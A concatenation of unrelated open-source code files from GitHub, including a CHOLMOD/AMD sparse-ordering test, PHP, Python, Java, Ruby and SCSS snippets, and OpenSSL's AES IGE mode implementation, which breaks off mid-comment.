        OK (sorted ? (ok == AMD_OK) : (ok >= AMD_OK)) ;
        OK (CHOLMOD(print_perm) (P, n, n, "AMD permutation", cm)) ;

        /* no dense rows/cols */
        alpha = Control [AMD_DENSE] ;
        Control [AMD_DENSE] = -1 ;
        AMD_control (Control) ;
        ok = AMD_order (n, Cp, Ci, P, Control, Info) ;
        printf ("amd return value: "ID"\n", ok) ;
        AMD_info (Info) ;
        OK (sorted ? (ok == AMD_OK) : (ok >= AMD_OK)) ;
        OK (CHOLMOD(print_perm) (P, n, n, "AMD permutation (alpha=-1)", cm)) ;

        /* many dense rows/cols */
        Control [AMD_DENSE] = 0 ;
        AMD_control (Control) ;
        ok = AMD_order (n, Cp, Ci, P, Control, Info) ;
        printf ("amd return value: "ID"\n", ok) ;
        AMD_info (Info) ;
        OK (sorted ? (ok == AMD_OK) : (ok >= AMD_OK)) ;
        OK (CHOLMOD(print_perm) (P, n, n, "AMD permutation (alpha=0)", cm)) ;
        Control [AMD_DENSE] = alpha ;

        /* no aggressive absorption */
        Control [AMD_AGGRESSIVE] = FALSE ;
        AMD_control (Control) ;
        ok = AMD_order (n, Cp, Ci, P, Control, Info) ;
        printf ("amd return value: "ID"\n", ok) ;
        AMD_info (Info) ;
        OK (sorted ? (ok == AMD_OK) : (ok >= AMD_OK)) ;
        OK (CHOLMOD(print_perm) (P, n, n, "AMD permutation (no agg) ", cm)) ;
        Control [AMD_AGGRESSIVE] = TRUE ;

        /* ------------------------------------------------------------------ */
        /* order F with AMD_order */
        /* ------------------------------------------------------------------ */

        Fp = F->p ;
        Fi = F->i ;
        ok = AMD_order (n, Fp, Fi, P, Control, Info) ;
        printf ("amd return value: "ID"\n", ok) ;
        AMD_info (Info) ;
        OK (sorted ? (ok == AMD_OK) : (ok >= AMD_OK)) ;
        OK (CHOLMOD(print_perm) (P, n, n, "F: AMD permutation", cm)) ;

        /* ------------------------------------------------------------------ */
        /* order S with AMD_order */
        /* ------------------------------------------------------------------ */

        ok = AMD_order (n, Sp, Si, P, Control, Info) ;
        printf ("amd return value: "ID"\n", ok) ;
        AMD_info (Info) ;
        OK (sorted ? (ok == AMD_OK) : (ok >= AMD_OK)) ;
        OK (CHOLMOD(print_perm) (P, n, n, "AMD permutation", cm)) ;

        /* ------------------------------------------------------------------ */
        /* order E with AMD_2, which destroys its contents */
        /* ------------------------------------------------------------------ */

        E = CHOLMOD(copy) (B, 0, -1, cm) ;      /* remove diagonal entries */
        bnz = CHOLMOD(nnz) (E, cm) ;

        /* add the bare minimum extra space to E */
        ok = CHOLMOD(reallocate_sparse) (bnz + n, E, cm) ;
        OK (ok) ;
        Ep = E->p ;
        Ei = E->i ;

        for (j = 0 ; j < n ; j++)
        {
            Len [j] = Ep [j+1] - Ep [j] ;
        }

        printf ("calling AMD_2:\n") ;
        if (n > 0)
        {
            AMD_2 (n, Ep, Ei, Len, E->nzmax, Ep [n], Nv, Next, P, Head, Elen,
                Deg, Wi, Control, Info) ;
            AMD_info (Info) ;
            OK (CHOLMOD(print_perm) (P, n, n, "AMD2 permutation", cm)) ;
        }

        /* ------------------------------------------------------------------ */
        /* error tests */
        /* ------------------------------------------------------------------ */

        /* each invalid argument must be reported as AMD_INVALID */
        ok = AMD_order (n, Cp, Ci, P, Control, Info) ;
        OK (sorted ? (ok == AMD_OK) : (ok >= AMD_OK)) ;
        ok = AMD_order (-1, Cp, Ci, P, Control, Info) ;
        OK (ok == AMD_INVALID);
        ok = AMD_order (0, Cp, Ci, P, Control, Info) ;
        OK (sorted ? (ok == AMD_OK) : (ok >= AMD_OK)) ;
        ok = AMD_order (n, NULL, Ci, P, Control, Info) ;
        OK (ok == AMD_INVALID);
        ok = AMD_order (n, Cp, NULL, P, Control, Info) ;
        OK (ok == AMD_INVALID);
        ok = AMD_order (n, Cp, Ci, NULL, Control, Info) ;
        OK (ok == AMD_INVALID);

        if (n > 0)
        {
            /* temporarily corrupt C, then restore it after each check */
            printf ("AMD error tests:\n") ;

            p = Cp [n] ;
            Cp [n] = -1 ;
            ok = AMD_order (n, Cp, Ci, P, Control, Info) ;
            OK (ok == AMD_INVALID) ;

            if (Size_max/2 == Int_max)
            {
                Cp [n] = Int_max ;
                ok = AMD_order (n, Cp, Ci, P, Control, Info) ;
                printf ("AMD status is "ID"\n", ok) ;
                OK (ok == AMD_OUT_OF_MEMORY) ;
            }

            Cp [n] = p ;
            ok = AMD_order (n, Cp, Ci, P, Control, Info) ;
            OK (sorted ? (ok == AMD_OK) : (ok >= AMD_OK)) ;

            if (Cp [n] > 0)
            {
                printf ("Mangle column zero:\n") ;
                i = Ci [0] ;
                Ci [0] = -1 ;
                ok = AMD_order (n, Cp, Ci, P, Control, Info) ;
                AMD_info (Info) ;
                OK (ok == AMD_INVALID) ;
                Ci [0] = i ;
            }
        }

        ok = AMD_valid (n, n, Sp, Si) ;
        OK (sorted ? (ok == AMD_OK) : (ok >= AMD_OK)) ;
        ok = AMD_valid (-1, n, Sp, Si) ;        OK (ok == AMD_INVALID) ;
        ok = AMD_valid (n, -1, Sp, Si) ;        OK (ok == AMD_INVALID) ;
        ok = AMD_valid (n, n, NULL, Si) ;       OK (ok == AMD_INVALID) ;
        ok = AMD_valid (n, n, Sp, NULL) ;       OK (ok == AMD_INVALID) ;

        if (n > 0 && Sp [n] > 0)
        {
            /* corrupt S in several ways; each mangle is undone afterwards */
            p = Sp [n] ;
            Sp [n] = -1 ;
            ok = AMD_valid (n, n, Sp, Si) ;     OK (ok == AMD_INVALID) ;
            Sp [n] = p ;

            p = Sp [0] ;
            Sp [0] = -1 ;
            ok = AMD_valid (n, n, Sp, Si) ;     OK (ok == AMD_INVALID) ;
            Sp [0] = p ;

            p = Sp [1] ;
            Sp [1] = -1 ;
            ok = AMD_valid (n, n, Sp, Si) ;     OK (ok == AMD_INVALID) ;
            Sp [1] = p ;

            i = Si [0] ;
            Si [0] = -1 ;
            ok = AMD_valid (n, n, Sp, Si) ;     OK (ok == AMD_INVALID) ;
            Si [0] = i ;
        }

        ok = AMD_valid (n, n, Sp, Si) ;
        OK (sorted ? (ok == AMD_OK) : (ok >= AMD_OK)) ;
        AMD_preprocess (n, Bp, Bi, Sp, Si, W, Flag) ;
        ok = AMD_valid (n, n, Sp, Si) ;
        OK (ok == AMD_OK) ;

        if (n > 0 && Bp [n] > 0)
        {
            p = Bp [n] ;
            Bp [n] = -1 ;
            ok = AMD_valid (n, n, Bp, Bi) ;     OK (ok == AMD_INVALID) ;
            Bp [n] = p ;

            p = Bp [1] ;
            Bp [1] = -1 ;
            ok = AMD_valid (n, n, Bp, Bi) ;     OK (ok == AMD_INVALID) ;
            Bp [1] = p ;

            i = Bi [0] ;
            Bi [0] = -1 ;
            ok = AMD_valid (n, n, Bp, Bi) ;     OK (ok == AMD_INVALID) ;
            Bi [0] = i ;
        }

        AMD_preprocess (n, Bp, Bi, Sp, Si, W, Flag) ;

        /* unrecognized status value exercises the AMD_info default branch */
        Info [AMD_STATUS] = 777 ;
        AMD_info (Info) ;

        /* ------------------------------------------------------------------ */
        /* memory tests */
        /* ------------------------------------------------------------------ */

        if (n > 0)
        {
            normal_memory_handler ( ) ;
            ok = AMD_order (n, Cp, Ci, P, Control, Info) ;
            OK (sorted ? (ok == AMD_OK) : (ok >= AMD_OK)) ;

            test_memory_handler ( ) ;
            /* fail the trial-th allocation to cover every OOM path */
            for (trial = 0 ; trial < 6 ; trial++)
            {
                my_tries = trial ;
                printf ("AMD memory trial "ID"\n", trial) ;
                ok = AMD_order (n, Cp, Ci, P, Control, Info) ;
                AMD_info (Info) ;
                OK (ok == AMD_OUT_OF_MEMORY
                    || (sorted ? (ok == AMD_OK) : (ok >= AMD_OK))) ;
            }
            normal_memory_handler ( ) ;
            OK (CHOLMOD(print_perm) (P, n, n, "AMD2 permutation", cm)) ;
        }

        CHOLMOD(free_sparse) (&E, cm) ;
    }

    /* ---------------------------------------------------------------------- */
    /* free everything */
    /* ---------------------------------------------------------------------- */

    CHOLMOD(free) (n, sizeof (Int), Len, cm) ;
    CHOLMOD(free) (n, sizeof (Int), Nv, cm) ;
    CHOLMOD(free) (n, sizeof (Int), Next, cm) ;
    CHOLMOD(free) (n+1, sizeof (Int), Head, cm) ;
    CHOLMOD(free) (n, sizeof (Int), Elen, cm) ;
    CHOLMOD(free) (n, sizeof (Int), Deg, cm) ;
    CHOLMOD(free) (n, sizeof (Int), Wi, cm) ;
    CHOLMOD(free) (n+1, sizeof (Int), P, cm) ;
    CHOLMOD(free) (n, sizeof (Int), W, cm) ;
    CHOLMOD(free) (n, sizeof (Int), Flag, cm) ;
    CHOLMOD(free_sparse) (&S, cm) ;
    CHOLMOD(free_sparse) (&B, cm) ;
    CHOLMOD(free_sparse) (&C, cm) ;
    CHOLMOD(free_sparse) (&F, cm) ;
}
| {
"pile_set_name": "Github"
} |
<?php
namespace SecTheater\Marketplace\Tests\Unit\Integration\Models;
use SecTheater\Marketplace\Models\EloquentCoupon as Coupon;
use SecTheater\Marketplace\Models\EloquentUser as User;
use SecTheater\Marketplace\Tests\TestCase;
/**
 * Integration tests for the coupon model's relations.
 */
class CouponTest extends TestCase {

    public function setUp() {
        parent::setUp();
        // Resolve the repository binding from the service container.
        $this->couponRepo = app('CouponRepository');
    }

    /** @test */
    public function it_has_an_owner() {
        // A coupon created with user_id exposes its creator via `owner`.
        $coupon = factory(Coupon::class)->create([
            'user_id' => auth()->id(),
        ]);
        $this->assertInstanceOf(User::class, $coupon->owner);
    }

    /** @test */
    public function it_has_many_users_purchased_to() {
        $coupon = factory(Coupon::class)->create([
            'user_id' => auth()->id(),
        ]);
        // Attach three purchasers through the `users` relation and
        // verify all three are returned.
        $coupon->users()->saveMany(
            factory(User::class, 3)->create()
        );
        $this->assertCount(3, $coupon->users);
    }
}
| {
"pile_set_name": "Github"
} |
from JDI.web.os_action.r_file_input import RFileInput
from JDI.web.selenium.elements.api_interact.find_element_by import By
from JDI.web.selenium.elements.common.link import Link
from JDI.web.selenium.elements.composite.web_page import WebPage
from Test.jdi_uitests_webtests.main.page_objects.sections.contact_form import ContactForm
class DatesPage(WebPage):
    """Page object for the JDI UI-tests "Dates" demo page.

    Exposes the file-upload widget, the uploaded-file-name link, and the
    composite contact-form section as locatable page elements.
    """

    def __init__(self, url, title):
        super(DatesPage, self).__init__(url=url, title=title)

    # NOTE(review): these are class-level (shared) attributes declared after
    # __init__; the JDI framework resolves elements from the page class.
    r_image_input = RFileInput(By.css("[data-provides=fileinput]"))  # upload widget
    uploaded_file_name = Link(By.css("[class=filename] span"))  # name of uploaded file
    contact_form = ContactForm(By.css("main form"))  # composite contact-form section
"pile_set_name": "Github"
} |
fileFormatVersion: 2
guid: f9739c5b807e4753b15e3373f1fbb12e
timeCreated: 1568184201 | {
"pile_set_name": "Github"
} |
/**
 * Turns Object with names of modules into Array of names of modules.
 *
 * Only keys whose value is truthy (i.e. enabled modules) are kept.
 *
 * @param {Object} modules
 * @returns {string[]}
 */
export default function enabledModuleNames(modules) {
  return Object.entries(modules)
    .filter(([, enabled]) => enabled)
    .map(([name]) => name);
}
| {
"pile_set_name": "Github"
} |
--TEST--
"for" tags can be nested
--TEMPLATE--
{% for key, item in items %}
* {{ key }} ({{ loop.length }}):
{% for value in item %}
* {{ value }} ({{ loop.length }})
{% endfor %}
{% endfor %}
--DATA--
return ['items' => ['a' => ['a1', 'a2', 'a3'], 'b' => ['b1']]]
--EXPECT--
* a (2):
* a1 (3)
* a2 (3)
* a3 (3)
* b (2):
* b1 (1)
| {
"pile_set_name": "Github"
} |
// Targeted by JavaCPP version 1.5.4: DO NOT EDIT THIS FILE
package org.bytedeco.arrow;
import java.nio.*;
import org.bytedeco.javacpp.*;
import org.bytedeco.javacpp.annotation.*;
import static org.bytedeco.javacpp.presets.javacpp.*;
import static org.bytedeco.arrow.global.arrow.*;
/**
 * JavaCPP mapping of the C++ container
 * {@code std::vector<std::shared_ptr<arrow::Buffer>>}.
 *
 * NOTE(review): this file is auto-generated by JavaCPP ("DO NOT EDIT");
 * behavioral changes belong in the generator configuration, not here.
 */
@Name("std::vector<std::shared_ptr<arrow::Buffer> >") @Properties(inherit = org.bytedeco.arrow.presets.arrow.class)
public class BufferVector extends Pointer {
    static { Loader.load(); }
    /** Pointer cast constructor. Invokes {@link Pointer#Pointer(Pointer)}. */
    public BufferVector(Pointer p) { super(p); }
    public BufferVector(ArrowBuffer value) { this(1); put(0, value); }
    public BufferVector(ArrowBuffer ... array) { this(array.length); put(array); }
    public BufferVector()       { allocate();  }
    public BufferVector(long n) { allocate(n); }
    private native void allocate();
    private native void allocate(@Cast("size_t") long n);
    public native @Name("operator =") @ByRef BufferVector put(@ByRef BufferVector x);

    public boolean empty() { return size() == 0; }
    public native long size();
    public void clear() { resize(0); }
    public native void resize(@Cast("size_t") long n);

    @Index(function = "at") public native @SharedPtr ArrowBuffer get(@Cast("size_t") long i);
    public native BufferVector put(@Cast("size_t") long i, ArrowBuffer value);

    public native @ByVal Iterator insert(@ByVal Iterator pos, @SharedPtr ArrowBuffer value);
    public native @ByVal Iterator erase(@ByVal Iterator pos);
    public native @ByVal Iterator begin();
    public native @ByVal Iterator end();
    /** Wrapper around the native {@code std::vector} iterator. */
    @NoOffset @Name("iterator") public static class Iterator extends Pointer {
        public Iterator(Pointer p) { super(p); }
        public Iterator() { }

        public native @Name("operator ++") @ByRef Iterator increment();
        public native @Name("operator ==") boolean equals(@ByRef Iterator it);
        public native @Name("operator *") @SharedPtr ArrowBuffer get();
    }

    /** Copies the native vector into a Java array (capped at Integer.MAX_VALUE elements). */
    public ArrowBuffer[] get() {
        ArrowBuffer[] array = new ArrowBuffer[size() < Integer.MAX_VALUE ? (int)size() : Integer.MAX_VALUE];
        for (int i = 0; i < array.length; i++) {
            array[i] = get(i);
        }
        return array;
    }
    @Override public String toString() {
        return java.util.Arrays.toString(get());
    }

    /** Removes and returns the last element. */
    public ArrowBuffer pop_back() {
        long size = size();
        ArrowBuffer value = get(size - 1);
        resize(size - 1);
        return value;
    }
    /** Appends {@code value}, growing the vector by one. */
    public BufferVector push_back(ArrowBuffer value) {
        long size = size();
        resize(size + 1);
        return put(size, value);
    }
    /** Replaces the contents with the single element {@code value}. */
    public BufferVector put(ArrowBuffer value) {
        if (size() != 1) { resize(1); }
        return put(0, value);
    }
    /** Replaces the contents with the given elements. */
    public BufferVector put(ArrowBuffer ... array) {
        if (size() != array.length) { resize(array.length); }
        for (int i = 0; i < array.length; i++) {
            put(i, array[i]);
        }
        return this;
    }
}
| {
"pile_set_name": "Github"
} |
// Theme variables for the panel component; all values are overridable
// via `!default`.

// TODO: Change value to $include-default-uis !default;
$include-panel-uis: true;

// ===============================
// ========= BASE PANEL ==========
// ===============================
$panel-border-radius: null !default;
$panel-border-width: 1px !default;

// Base and border colors are derived from the theme's $base-color.
$panel-base-color: adjust-color($base-color, $hue: 0deg, $saturation: 0.542%, $lightness: 7.843%) !default; //#DFE8F6
$panel-border-color: adjust-color($base-color, $hue: 0deg, $saturation: 7.644%, $lightness: -8.627%) !default;

// ===============================
// ========= PANEL BODY ==========
// ===============================
$panel-body-border-style: solid !default;
$panel-body-background-color: #fff !default;
$panel-body-color: #000 !default;
$panel-body-border-color: $panel-border-color !default;
$panel-body-font-size: 12px !default;

// ===============================
// ======== PANEL TOOLS ==========
// ===============================
$tool-size: 15px !default;

// ===============================
// ======== PANEL HEADER =========
// ===============================
$panel-header-border-width: 1px !default;
$panel-header-border-style: solid !default;
$panel-header-inner-border: true !default;
$panel-header-inner-border-width: 1px 0 0 !default;

//padding
$panel-header-padding: 5px 4px 4px 5px !default;

//fonts
$panel-header-font-size: ceil($font-size * .9) !default; //11px
$panel-header-line-height: $tool-size !default;
$panel-header-font-weight: bold !default;
$panel-header-font-family: $font-family !default;

//background
$panel-header-background-gradient: 'panel-header' !default;

// UI defaults
$panel-header-border-color: $panel-border-color !default;
$panel-header-inner-border-color: adjust-color($panel-base-color, $hue: 0deg, $saturation: -6.098%, $lightness: 4.902%) !default;
$panel-header-color: adjust-color($panel-base-color, $hue: 0deg, $saturation: 38.347%, $lightness: -63.725%) !default;
$panel-header-background-color: adjust-color($panel-base-color, $hue: 0deg, $saturation: 6.402%, $lightness: -4.51%) !default;

// ===============================
// ======== FRAMED PANEL =========
// ===============================
$frame-base-color: $panel-base-color !default;

//border
$panel-frame-border-radius: 4px !default;
$panel-frame-border-width: 1px !default;
$panel-frame-border-style: solid !default;
$panel-frame-padding: 4px !default;

// UI defaults
$panel-frame-background-color: $frame-base-color !default;
$panel-frame-border-color: $panel-border-color !default;
| {
"pile_set_name": "Github"
} |
/* Copyright (c) 2008 Google Inc.
*
* Licensed under the Apache License, Version 2.0 (the "License");
* you may not use this file except in compliance with the License.
* You may obtain a copy of the License at
*
* http://www.apache.org/licenses/LICENSE-2.0
*
* Unless required by applicable law or agreed to in writing, software
* distributed under the License is distributed on an "AS IS" BASIS,
* WITHOUT WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied.
* See the License for the specific language governing permissions and
* limitations under the License.
*/
package com.google.gdata.data.calendar;
import com.google.gdata.data.ExtensionDescription;
import com.google.gdata.data.ValueConstruct;
/**
* GData schema extension describing override name property of a calendar
*
*
*/
public class OverrideNameProperty extends ValueConstruct {

    /**
     * Returns the default extension description for this property:
     * the gCal namespace with local name "overridename".
     */
    public static ExtensionDescription getDefaultDescription() {
        return new ExtensionDescription(OverrideNameProperty.class,
            Namespaces.gCalNs, "overridename");
    }

    /** Creates an override name property with no value. */
    public OverrideNameProperty() {
        this(null);
    }

    /**
     * Creates an override name property.
     *
     * @param value the override name, stored in the "value" attribute
     */
    public OverrideNameProperty(String value) {
        super(Namespaces.gCalNs, "overridename", "value", value);
    }
}
| {
"pile_set_name": "Github"
} |
/*
* GeoTools - The Open Source Java GIS Toolkit
* http://geotools.org
*
* (C) 2004-2008, Open Source Geospatial Foundation (OSGeo)
*
* This library is free software; you can redistribute it and/or
* modify it under the terms of the GNU Lesser General Public
* License as published by the Free Software Foundation;
* version 2.1 of the License.
*
* This library is distributed in the hope that it will be useful,
* but WITHOUT ANY WARRANTY; without even the implied warranty of
* MERCHANTABILITY or FITNESS FOR A PARTICULAR PURPOSE. See the GNU
* Lesser General Public License for more details.
*/
package org.geotools.referencing.factory.epsg.oracle;
import java.sql.Connection;
import java.util.Iterator;
import java.util.Map;
import java.util.regex.Pattern;
import javax.sql.DataSource;
import org.geotools.referencing.factory.epsg.AnsiDialectEpsgFactory;
import org.geotools.util.factory.Hints;
/**
* An EPSG factory suitable for Oracle SQL syntax.
*
* @since 2.4
* @version $Id$
* @author John Grange
* @todo Since this class is constructed through the service provider API rather than directly
* instantiated by the user, we need some way to pass the schema information to this class. one
* possible approach is to set the schema in preferences. Maybe a better was is to look for a
* place in the Oracle {@link javax.sql.DataSource} for that.
*/
public class OracleDialectEpsgFactory extends AnsiDialectEpsgFactory {
    /** The pattern to use for removing <code>" as "</code> elements from the SQL statements. */
    private final Pattern pattern = Pattern.compile("\\sAS\\s");

    /**
     * Constructs an authority factory using the specified connection.
     *
     * @param userHints The underlying factories used for objects creation.
     * @param connection The connection to the underlying EPSG database.
     */
    public OracleDialectEpsgFactory(final Hints userHints, final Connection connection) {
        super(userHints, connection);
    }

    /**
     * Constructs an authority factory using the specified datasource.
     *
     * @param userHints The underlying factories used for objects creation.
     * @param datasource The datasource of the underlying EPSG database.
     */
    public OracleDialectEpsgFactory(final Hints userHints, final DataSource datasource) {
        super(userHints, datasource);
    }

    /**
     * Constructs an authority factory using the specified connection to an EPSG database and a
     * database schema. If the database schema is not supplied, or it is null or an empty string,
     * then the tables are assumed to be in the same schema as the user which is being used to
     * connect to the database. You <strong>MUST</strong> ensure that the connecting user has
     * permissions to select from all the tables in the epsg user schema.
     *
     * @param userHints The underlying factories used for objects creation.
     * @param connection The connection to the underlying EPSG database.
     * @param epsgSchema The database schema in which the epsg tables are stored (optional).
     */
    public OracleDialectEpsgFactory(
            final Hints userHints, final Connection connection, final String epsgSchema) {
        super(userHints, connection);
        adaptTableNames(epsgSchema);
    }

    /**
     * Modifies the given SQL string to be suitable for an Oracle databases. This removes {@code "
     * AS "} elements from the SQL statements as these don't work in oracle.
     *
     * @param statement The statement in MS-Access syntax.
     * @return The SQL statement to use, suitable for an Oracle database.
     */
    protected String adaptSQL(final String statement) {
        // First apply the ANSI adaptation from the superclass, then strip " AS ".
        return pattern.matcher(super.adaptSQL(statement)).replaceAll(" ");
    }

    /**
     * If we have been supplied with a non null {@code epsgSchema}, prepend the schema to all the
     * table names.
     *
     * @param epsgSchema The database schema in which the epsg tables are stored (optional).
     */
    private void adaptTableNames(String epsgSchema) {
        if (epsgSchema != null) {
            epsgSchema = epsgSchema.trim();
            if (epsgSchema.length() != 0) {
                // NOTE(review): `map` is inherited from the superclass and iterated
                // with raw types here; presumably String -> String — confirm before
                // adding generics.
                for (final Iterator it = map.entrySet().iterator(); it.hasNext(); ) {
                    final Map.Entry entry = (Map.Entry) it.next();
                    final String tableName = (String) entry.getValue();
                    /**
                     * Update the map, prepending the schema name to the table name so long as the
                     * value is a table name and not a field. This algorithm assumes that all old
                     * table names start with "epsg_".
                     */
                    if (tableName.startsWith("epsg_")) {
                        entry.setValue(epsgSchema + '.' + tableName);
                    }
                }
            }
        }
    }
}
| {
"pile_set_name": "Github"
} |
require 'rexml/document'
module Saxerator
module Builder
class XmlBuilder
attr_reader :name
def initialize(config, name, attributes)
@config = config
@name = name
@attributes = attributes
@children = []
@text = false
end
def add_node(node)
@text = true if node.is_a? String
@children << node
end
def to_xml(builder)
element = REXML::Element.new(name, nil, attribute_quote: :quote)
element.add_attributes(@attributes)
if @text
element.add_text(@children.join)
else
@children.each { |child| child.to_xml(element) }
end
builder.elements << element
end
def block_variable
builder = REXML::Document.new
builder << REXML::XMLDecl.new('1.0', 'UTF-8')
to_xml(builder)
builder
end
end
end
end
| {
"pile_set_name": "Github"
} |
<?php
/**
* Author: XiaoFei Zhai
* Date: 2018/1/30
* Time: 9:49
*/
namespace App\Admin\Extensions;
use Encore\Admin\Form\Field;
/**
 * Laravel-admin form field for chunked uploads via aetherupload.
 */
class AetherUpload extends Field
{
    // Blade view used to render this field.
    protected $view = 'admin.aetherupload';

    // No extra stylesheets are required by this field.
    protected static $css = [
    ];

    // Client-side assets: SparkMD5 for hashing chunks plus the
    // aetherupload front-end script.
    // NOTE(review): one path has a leading slash and the other does not —
    // confirm both resolve as intended.
    protected static $js = [
        '/js/spark-md5.min.js',
        'js/aetherupload.js'
    ];

    /**
     * Render the field; delegates to the base Field renderer.
     */
    public function render()
    {
        return parent::render();
    }
}
"pile_set_name": "Github"
} |
/*
* Copyright 2006-2016 The OpenSSL Project Authors. All Rights Reserved.
*
* Licensed under the OpenSSL license (the "License"). You may not use
* this file except in compliance with the License. You can obtain a copy
* in the file LICENSE in the source distribution or at
* https://www.openssl.org/source/license.html
*/
#include "internal/cryptlib.h"
#include <openssl/aes.h>
#include "aes_locl.h"
/* View one AES block as an array of machine words so the IGE chaining can
 * XOR a whole block word-by-word. */
#define N_WORDS (AES_BLOCK_SIZE / sizeof(unsigned long))
typedef struct {
    unsigned long data[N_WORDS];
} aes_block_t;

/* XXX: probably some better way to do this */
#if defined(__i386__) || defined(__x86_64__)
# define UNALIGNED_MEMOPS_ARE_FAST 1
#else
# define UNALIGNED_MEMOPS_ARE_FAST 0
#endif

/* Fast path: copy a block with a single aligned-or-not word-struct
 * assignment; fallback: byte-wise memcpy.
 * NOTE(review): the cast form type-puns the caller's byte buffer as
 * aes_block_t, which relies on compiler behavior rather than strict ISO C
 * aliasing rules — intentional here, gated to x86 where it is known safe. */
#if UNALIGNED_MEMOPS_ARE_FAST
# define load_block(d, s)       (d) = *(const aes_block_t *)(s)
# define store_block(d, s)      *(aes_block_t *)(d) = (s)
#else
# define load_block(d, s)       memcpy((d).data, (s), AES_BLOCK_SIZE)
# define store_block(d, s)      memcpy((d), (s).data, AES_BLOCK_SIZE)
#endif
/* N.B. The IV for this mode is _twice_ the block size */

/*
 * Encrypt or decrypt |length| bytes in AES IGE mode.
 *
 * in/out: source and destination buffers; out may equal in (the slow
 *         path handles in-place operation).
 * length: byte count, asserted to be a multiple of AES_BLOCK_SIZE.
 * key:    expanded AES key matching |enc| (encrypt or decrypt schedule).
 * ivec:   2 * AES_BLOCK_SIZE bytes of chaining state; updated on return
 *         so consecutive calls can continue the stream.
 * enc:    AES_ENCRYPT or AES_DECRYPT.
 */
void AES_ige_encrypt(const unsigned char *in, unsigned char *out,
                     size_t length, const AES_KEY *key,
                     unsigned char *ivec, const int enc)
{
    size_t n;
    size_t len = length;

    /* Nothing to do for empty input (and skip the asserts). */
    if (length == 0)
        return;

    OPENSSL_assert(in && out && key && ivec);
    OPENSSL_assert((AES_ENCRYPT == enc) || (AES_DECRYPT == enc));
    OPENSSL_assert((length % AES_BLOCK_SIZE) == 0);

    /* From here on, len counts whole blocks rather than bytes. */
    len = length / AES_BLOCK_SIZE;

    if (AES_ENCRYPT == enc) {
        /*
         * Fast path: word-sized access through aes_block_t pointers.
         * Requires in != out (the feedback reads the previous plaintext
         * from the input buffer) and either fast unaligned memops or all
         * three pointers word-aligned.
         */
        if (in != out &&
            (UNALIGNED_MEMOPS_ARE_FAST
             || ((size_t)in | (size_t)out | (size_t)ivec) % sizeof(long) ==
             0)) {
            aes_block_t *ivp = (aes_block_t *) ivec;
            aes_block_t *iv2p = (aes_block_t *) (ivec + AES_BLOCK_SIZE);

            while (len) {
                aes_block_t *inp = (aes_block_t *) in;
                aes_block_t *outp = (aes_block_t *) out;

                /* C[i] = E(P[i] ^ C[i-1]) ^ P[i-1] */
                for (n = 0; n < N_WORDS; ++n)
                    outp->data[n] = inp->data[n] ^ ivp->data[n];
                AES_encrypt((unsigned char *)outp->data,
                            (unsigned char *)outp->data, key);
                for (n = 0; n < N_WORDS; ++n)
                    outp->data[n] ^= iv2p->data[n];
                /* Carry forward: previous ciphertext / previous plaintext. */
                ivp = outp;
                iv2p = inp;
                --len;
                in += AES_BLOCK_SIZE;
                out += AES_BLOCK_SIZE;
            }
            /* Persist the chaining values for a follow-up call. */
            memcpy(ivec, ivp->data, AES_BLOCK_SIZE);
            memcpy(ivec + AES_BLOCK_SIZE, iv2p->data, AES_BLOCK_SIZE);
        } else {
            /*
             * Slow path: buffer each block through locals.  Handles
             * in == out and misaligned pointers.
             */
            aes_block_t tmp, tmp2;
            aes_block_t iv;
            aes_block_t iv2;

            load_block(iv, ivec);
            load_block(iv2, ivec + AES_BLOCK_SIZE);

            while (len) {
                load_block(tmp, in);
                /* tmp2 = E(P[i] ^ C[i-1]) ^ P[i-1] */
                for (n = 0; n < N_WORDS; ++n)
                    tmp2.data[n] = tmp.data[n] ^ iv.data[n];
                AES_encrypt((unsigned char *)tmp2.data,
                            (unsigned char *)tmp2.data, key);
                for (n = 0; n < N_WORDS; ++n)
                    tmp2.data[n] ^= iv2.data[n];
                store_block(out, tmp2);
                /* Carry forward ciphertext (iv) and plaintext (iv2). */
                iv = tmp2;
                iv2 = tmp;
                --len;
                in += AES_BLOCK_SIZE;
                out += AES_BLOCK_SIZE;
            }
            memcpy(ivec, iv.data, AES_BLOCK_SIZE);
            memcpy(ivec + AES_BLOCK_SIZE, iv2.data, AES_BLOCK_SIZE);
        }
    } else {
        /* Decryption: same aliasing/alignment split as above. */
        if (in != out &&
            (UNALIGNED_MEMOPS_ARE_FAST
             || ((size_t)in | (size_t)out | (size_t)ivec) % sizeof(long) ==
             0)) {
            aes_block_t *ivp = (aes_block_t *) ivec;
            aes_block_t *iv2p = (aes_block_t *) (ivec + AES_BLOCK_SIZE);

            while (len) {
                aes_block_t tmp;
                aes_block_t *inp = (aes_block_t *) in;
                aes_block_t *outp = (aes_block_t *) out;

                /* P[i] = D(C[i] ^ P[i-1]) ^ C[i-1] */
                for (n = 0; n < N_WORDS; ++n)
                    tmp.data[n] = inp->data[n] ^ iv2p->data[n];
                AES_decrypt((unsigned char *)tmp.data,
                            (unsigned char *)outp->data, key);
                for (n = 0; n < N_WORDS; ++n)
                    outp->data[n] ^= ivp->data[n];
                /* Carry forward: previous ciphertext / previous plaintext. */
                ivp = inp;
                iv2p = outp;
                --len;
                in += AES_BLOCK_SIZE;
                out += AES_BLOCK_SIZE;
            }
            memcpy(ivec, ivp->data, AES_BLOCK_SIZE);
            memcpy(ivec + AES_BLOCK_SIZE, iv2p->data, AES_BLOCK_SIZE);
        } else {
            aes_block_t tmp, tmp2;
            aes_block_t iv;
            aes_block_t iv2;

            load_block(iv, ivec);
            load_block(iv2, ivec + AES_BLOCK_SIZE);

            while (len) {
                load_block(tmp, in);
                /* Keep the raw ciphertext for the next block's feedback. */
                tmp2 = tmp;
                for (n = 0; n < N_WORDS; ++n)
                    tmp.data[n] ^= iv2.data[n];
                AES_decrypt((unsigned char *)tmp.data,
                            (unsigned char *)tmp.data, key);
                for (n = 0; n < N_WORDS; ++n)
                    tmp.data[n] ^= iv.data[n];
                store_block(out, tmp);
                /* Carry forward ciphertext (iv) and plaintext (iv2). */
                iv = tmp2;
                iv2 = tmp;
                --len;
                in += AES_BLOCK_SIZE;
                out += AES_BLOCK_SIZE;
            }
            memcpy(ivec, iv.data, AES_BLOCK_SIZE);
            memcpy(ivec + AES_BLOCK_SIZE, iv2.data, AES_BLOCK_SIZE);
        }
    }
}
/*
 * Note that it's effectively impossible to do biIGE in anything other
 * than a single pass, so no provision is made for chaining.
 */
/* N.B. The IV for this mode is _four times_ the block size */

/*
 * Bidirectional IGE: a forward IGE pass over the data followed by a
 * backward IGE pass over the result (order reversed for decryption).
 *
